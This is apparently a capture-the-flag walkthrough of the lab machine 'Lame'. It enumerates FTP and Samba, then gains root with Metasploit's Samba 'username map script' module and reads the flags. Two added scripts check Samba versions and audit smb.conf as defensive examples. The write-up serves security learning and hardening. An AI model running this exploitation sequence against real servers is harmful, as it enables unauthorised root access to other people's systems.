Scanning and Enumerating

As usual, let’s start with nmap:
$ nmap -sC -sV -oA lame 10.10.10.3 👀

Since this can sometimes take time, and because it's important to document, I save the output to a file and read it back:
$ cat ~/Documents/nmap/lame.nmap

Trying Anonymous FTP

I tried logging in to FTP anonymously. The ftp package wasn’t installed so I had to install it:
$ apt install ftp

I was then able to log in successfully with the username: anonymous and password: password.
$ ftp 10.10.10.3

Once in, I listed the contents with $ ls -la; it doesn't look promising because no files or directories are listed.

Moving on to Samba

In the nmap scan I didn't get an actual Samba version, so I had to do a bit more enumeration on Samba specifically. I've never really messed with Samba, so I Googled 'site:kali.org samba' and found two tools: SMBMap and enum4linux. SMBMap didn't give me any version numbers, so I tried:
$ enum4linux 10.10.10.3
and boom, "lame server (Samba 3.0.20-Debian)" was in the results.

Now we can look for a Samba 3.0.20 exploit: $ searchsploit samba 3.0.20

I got: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Com | exploits/unix/remote/16320.rb and a heap overflow exploit. 'Username map script' is a command execution attack, and that sounds more straightforward than a heap overflow, so I tried that first.
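The searchsploit title above gives the affected range explicitly (3.0.20 up to, but not including, 3.0.25rc3), and the enum4linux banner gives the installed version. The following is an added example, not part of the original writeup or of any tool it mentions: a small Python triage script that pulls Samba banners out of tool output and decides whether each one falls inside that range. It handles release-candidate suffixes so that 3.0.25rc2 sorts before 3.0.25rc3 and before the final 3.0.25. The sample output it runs on is constructed for this example (loosely modelled on enum4linux's text, not a real capture), and the second host IP is a documentation address.

```python
import re

# "Samba <version>" as it appears in service banners and enumeration output.
BANNER_RE = re.compile(r"Samba\s+(\d+\.\d+\.\d+(?:rc\d+)?(?:-[A-Za-z0-9]+)?)")
# major.minor.patch with an optional rcN suffix; distro tags like "-Debian" are ignored.
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")

FINAL_RELEASE = 10**6  # rank used for a final release so it sorts after any rcN


def parse_samba_version(text):
    """Return a comparable (major, minor, patch, rc_rank) tuple, or None if absent."""
    m = VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch, rc = m.groups()
    rc_rank = int(rc) if rc is not None else FINAL_RELEASE
    return (int(major), int(minor), int(patch), rc_rank)


# Bounds taken from the searchsploit title: "3.0.20 < 3.0.25rc3".
AFFECTED_MIN = parse_samba_version("3.0.20")
FIXED_AT = parse_samba_version("3.0.25rc3")


def is_in_affected_range(text):
    """True if the version in `text` is inside [3.0.20, 3.0.25rc3); None if no version found."""
    v = parse_samba_version(text)
    if v is None:
        return None
    return AFFECTED_MIN <= v < FIXED_AT


def triage_enum_output(output):
    """Map every distinct Samba banner found in `output` to a verdict string."""
    results = {}
    for m in BANNER_RE.finditer(output):
        banner = m.group(0)
        results[banner] = "AFFECTED" if is_in_affected_range(banner) else "not in range"
    return results


# Constructed sample, loosely modelled on enum4linux output; not a real capture.
SAMPLE_OUTPUT = """\
[+] Got OS info for 10.10.10.3 from smbclient: Server=[Samba 3.0.20-Debian]
    LAME   lame server (Samba 3.0.20-Debian)
[+] Got OS info for 192.0.2.10 from smbclient: Server=[Samba 4.17.4-Ubuntu]
"""

if __name__ == "__main__":
    for banner, verdict in triage_enum_output(SAMPLE_OUTPUT).items():
        print(f"{banner}: {verdict}")
```

The same comparison works for any "min <= v < fixed" range you read off an advisory; only the two bound constants change. Treat the verdict as a prompt to check the vendor's backported fixes rather than proof, since distro builds such as "-Debian" can carry patches without a version bump.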

Exploiting Samba with Metasploit

I tried the usual way of using a searchsploit exploit with Metasploit, copying the module into my local msf modules directory:
$ cp /usr/share/exploitdb/exploits/unix/remote/16320.rb /root/.msf4/modules/exploits/unix/remote

then fired up Metasploit and ran the exploit:

$ msfconsole
msf5 > use exploit/unix/remote/16320.rb
msf5 > set RHOST 10.10.10.3
msf5 > exploit

I was able to use the exploit, but I kept getting an error. 😕

Exploit failed: NameError undefined local variable or method `connect' for #<Msf:0x00005626cbd4fb50>

After a couple of tries I searched for the exploit inside msf: search samba 3.0.20. It looks like Searchsploit had the wrong path; in Metasploit the module is at exploit/multi/samba/usermap_script.

So I tried again:

msf5 > use exploit/multi/samba/usermap_script
msf5 > set RHOST 10.10.10.3
msf5 > exploit

And we have a successful ecploiy, I mean, exploit. \o/

Capture the Flags

Root Flag
Run whoami: I'm root, nice.
Change to the root directory with cd /root and there is the root flag.
Get the flag: $ cat root.txt

User Flag
Now let’s see if we can easily find that user flag: $ find / -name user.txt
That was simple: /home/makis/user.txt
Get the flag: $ cat /home/makis/user.txt

Takeaways

  • Sometimes the most obvious possible vulnerability isn't the best route. Enumerate more.
  • Update your server software to avoid being vulnerable to easily exploitable bugs.
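On the defensive side of that second takeaway: the Metasploit module used above is named after the Samba smb.conf parameter "username map script", which hands the supplied username to an external program, and a server that does not set it is not exposed to this particular module regardless of version. The following is an added example, not part of the original writeup or of Samba itself: a minimal smb.conf parser and audit that flags the parameter wherever it appears, shown against a constructed weak config and a constructed hardened one. The script path in the weak config is hypothetical, and the hardened config uses Samba's static "username map" file option instead. The parser normalises parameter names the way Samba does (case-insensitive, internal whitespace ignored), so spelling variants are still caught.

```python
import re

def parse_smb_conf(text):
    """Minimal smb.conf parser: {section_name: {normalised_key: value}}.

    Samba ignores case and internal whitespace in parameter names, so
    'Username Map Script' and 'usernamemapscript' are the same key here.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":  # blank line or whole-line comment
            continue
        header = re.match(r"\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            norm = re.sub(r"\s+", "", key).lower()
            sections[current][norm] = value.strip()
    return sections


# Parameters worth flagging, keyed by normalised name, with the advice to report.
RISKY_PARAMETERS = {
    "usernamemapscript": (
        "username is passed to an external script; remove the option "
        "(use a static 'username map' file if mapping is needed) and run a fixed Samba release"
    ),
}


def audit_smb_conf(text):
    """Return a list of (section, parameter, value, advice) findings."""
    findings = []
    for section, params in parse_smb_conf(text).items():
        for norm, advice in RISKY_PARAMETERS.items():
            if norm in params:
                findings.append((section, norm, params[norm], advice))
    return findings


# Constructed weak config; the script path is hypothetical.
WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lame server
   ; hypothetical mapping script, constructed for this example
   Username Map Script = /etc/samba/scripts/mapuser.sh

[tmp]
   path = /tmp
   writable = yes
"""

# Constructed hardened config: static mapping file instead of a script.
HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lame server
   username map = /etc/samba/smbusers

[tmp]
   path = /tmp
   writable = yes
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = audit_smb_conf(conf)
        print(f"{label}: {len(findings)} finding(s)")
        for section, param, value, advice in findings:
            print(f"  [{section}] {param} = {value}\n    -> {advice}")
```

Run it against a copy of the real /etc/samba/smb.conf (for example, audit_smb_conf(open(path).read())) to get the same findings for a live host; extending RISKY_PARAMETERS is the intended way to add further checks.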